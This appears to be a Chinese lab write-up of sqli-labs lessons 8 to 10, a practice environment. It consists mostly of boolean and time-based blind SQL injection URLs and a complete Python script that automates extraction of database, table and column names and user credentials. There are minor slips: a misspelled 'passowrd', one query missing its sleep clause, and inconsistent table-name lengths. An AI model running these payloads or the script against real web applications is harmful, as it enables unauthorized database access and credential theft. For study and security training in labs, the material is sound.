Less8
第八关依然是先看一般状态
http://localhost/sqli-labs/Less-8/?id=1
然后用单引号闭合:
http://localhost/sqli-labs/Less-8/?id=1'
这关的问题在于报错是不显示,那没办法通过上篇文章的updatexml大法处理。对于这种情况,需要用“盲注”,说白了就是猜,例如如下:
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd
这里猜数据库第一个字幕是s,当然我们不是神,肯定不可能一猜就猜中。一般来说就得一个一个猜。当然我们可以利用二分查找的思路,通过大于小于的方式,确定并逐步缩小区间,这样可以减少查询的次数。
我们通过这样的方式,可以顺利查出所属数据库,另外还得先查字符串的长度,确定了长度再一个一个字符盲注尝试:
http://localhost/sqli-labs/Less-8/?id=1' and LENGTH(DATABASE())=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 2, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 3, 1)='c' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 4, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 5, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 6, 1)='i' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 7, 1)='t' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 8, 1)='y' -- asd
一通操作下来,逐个字符对比,就能试出是security这个。同样的方法,可以找出在information_schema.tables中第四个表的表名是users:
http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s' -- asd
这里都是忽略了一个一个表,一个一个字符尝试的过程。
之后用同样的方式,盲注找出列名:
http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d' -- asd
盲注后匹配第四和第五个列名是username和password。
之后盲注找出用户名和密码:
http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(username) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 4, 1))=98 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(password) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 4, 1))=98 -- asd
这里用了ascii码来匹配,因为账号密码是有大小写区分,但mysql默认配置里是不区分大小写。前面数据库名、表名、列名也可以用ascii码去匹配。如果数据库本身是区分大小写的话就一定要用ascii码来匹配。
Less9
第九关难度更大了,会发现无论输入什么闭合,页面返回都一样。这代表这个页面是无论对错,返回的东西都一样。那这种情况怎么办?这里要用到“时间盲注”。时间盲注具体的做法是,如果注入判断条件正确,则sleep一段时间,如果错误就立即返回。这样通过看请求是否sleep就能判断之前的条件是否正确。而注入条件则是第八关的内容。
举个例子当我们输入:
http://localhost/sqli-labs/Less-9/?id=1' and if(1=1,sleep(2),1) -- asd
浏览器左上角会转圈圈大概2秒,通过浏览器开发者工具f12
看到等待了2秒服务器才返回。这就是时间盲注。
所以可以利用同样的语句找出数据库名:
http://localhost/sqli-labs/Less-9/?id=1' and if(LENGTH(DATABASE())=8, sleep(2), 1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 1, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 2, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 3, 1)='c', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 4, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 5, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 6, 1)='i', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 7, 1)='t', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 8, 1)='y', sleep(2),1) -- asd
找出表名:
http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s', sleep(2),1) -- asd
找出列名:
http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d', sleep(2),1) -- asd
最后找出账号名密码:
http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(username) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(passowrd) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd
除了添加了if条件和sleep之外,基本和第八关一致,效果就不另外展示了。
时间盲注脚本
一个一个手动试,除非本身知道答案,否则太费劲了,所以可以用python脚本处理
import requests
import time
db_ascii = [48,49,50,51,52,53,54,55,56,57,58,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,
89,90,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,
122]
def get_method(url_params):
t1 = time.time()
#print(url_params)
r = requests.get('http://localhost/sqli-labs/Less-8', params=url_params)
t2 = time.time()
if t2-t1 > 2:
return True
return False
def check_database():
##数据库名长度
database_len = 0
for i in range(100):
params = {'id': "1' and if(LENGTH(DATABASE())=" + str(i) + ", sleep(2), 1) -- asd"}
if get_method(params):
database_len = i
print('database name length is: ' + str(database_len))
break
for j in range(database_len):
for db_char in db_ascii:
params = {'id': "1' and if(ASCII(substr(database(), " + str(j + 1) + ", 1))=" + str(db_char) + ", sleep(2),1) -- asd"}
if get_method(params):
print(chr(db_char), end='')
break
time.sleep(0.05)
print('')
def check_table():
##表数
table_num = 0
for i in range(100):
num_params = {'id': "1' and if((select count(1) from information_schema.tables where table_schema=database())=" +
str(i) + ", sleep(2),1) -- asd"}
if get_method(num_params):
table_num = i
print('table number is: ' + str(table_num))
break
for k in range(table_num):
##表名长度
table_name_len = 0
for l in range(100):
tb_len_params = {'id': "1' and if((select LENGTH(table_name) from information_schema.tables where " +
"table_schema=database() limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}
if get_method(tb_len_params):
table_name_len = l
print('table name length is: ' + str(table_name_len))
break
##表名
for j in range(table_name_len):
for tb_char in db_ascii:
tb_name_params = {'id': "1' and if(ASCII(substr((select table_name from information_schema.tables " +
"where table_schema=database() limit " + str(k) + ",1), " + str(j+1) + ", 1))=" + str(tb_char) + ", " +
"sleep(2),1) -- asd"}
if get_method(tb_name_params):
print(chr(tb_char), end='')
break
time.sleep(0.05)
print('')
def check_column(tb_name):
##列数
col_num = 0
for i in range(100):
num_params = {'id': "1' and if((select count(1) from information_schema.columns where table_name='" + tb_name + "')=" +
str(i) + ", sleep(2),1) -- asd"}
if get_method(num_params):
col_num = i
print('column number is: ' + str(col_num))
break
for k in range(col_num):
##列名长度
col_name_len = 0
for l in range(100):
col_len_params = {'id': "1' and if((select LENGTH(column_name) from information_schema.columns where " +
"table_name='" + tb_name + "' limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}
if get_method(col_len_params):
col_name_len = l
print('column name length is: ' + str(col_name_len))
break
##列名
for j in range(col_name_len):
for col_char in db_ascii:
col_name_params = {'id': "1' and if(ASCII(substr((select column_name from information_schema.columns " +
"where table_name='" + tb_name + "' limit " + str(k) + ",1), " + str(j + 1) + ", 1))=" +
str(col_char) + ", sleep(2),1) -- asd"}
if get_method(col_name_params):
print(chr(col_char), end='')
break
time.sleep(0.05)
print('')
def check_username_password(tb_name, username_col, password_col, start, end):
for i in range(start, end):
#用户名长度
username_len = 0
for j in range(100):
username_len_params = {'id': "1' and if((select LENGTH(" + username_col + ") from " + tb_name +
" limit " + str(i) + ", 1)=" + str(j) + ", sleep(2),1) -- asd"}
if get_method(username_len_params):
username_len = j
print('username length is: ' + str(j))
break
for k in range(username_len):
for username_char in range(33,127):
username_params = {'id': "1' and if(ASCII(substr((select " + username_col + " from " + tb_name +
" limit " + str(i) + ",1), " + str(k+1) + ", 1))=" + str(username_char) +
", sleep(2),1) -- asd"}
if get_method(username_params):
print(chr(username_char), end='')
break
time.sleep(0.05)
print('')
# 密码长度
password_len = 0
for l in range(100):
password_len_params = {'id': "1' and if((select LENGTH(" + password_col + ") from " + tb_name +
" limit " + str(i) + ", 1)=" + str(l) + ", sleep(2),1) -- asd"}
if get_method(password_len_params):
password_len = l
print('password length is: ' + str(l))
break
for m in range(password_len):
for password_char in range(33,127):
password_params = {'id': "1' and if(ASCII(substr((select " + password_col + " from " + tb_name +
" limit " + str(i) + ",1), " + str(m+1) + ", 1))=" + str(password_char) +
", sleep(2),1) -- asd"}
if get_method(password_params):
print(chr(password_char), end='')
break
time.sleep(0.05)
print('')
if __name__ == '__main__':
check_database()
check_table()
#check_column('users')
#check_username_password('users', 'username', 'password', 0, 2)
写了一个穷举式的,读者感兴趣可以写个二分查找会更快。其中查列名和用户名密码的函数需要在前面的函数中获取到表名和列名,才能作为传参。
Less10
第十关和第九关除了闭合区间变成双引号外,其余一致,就不另外写了。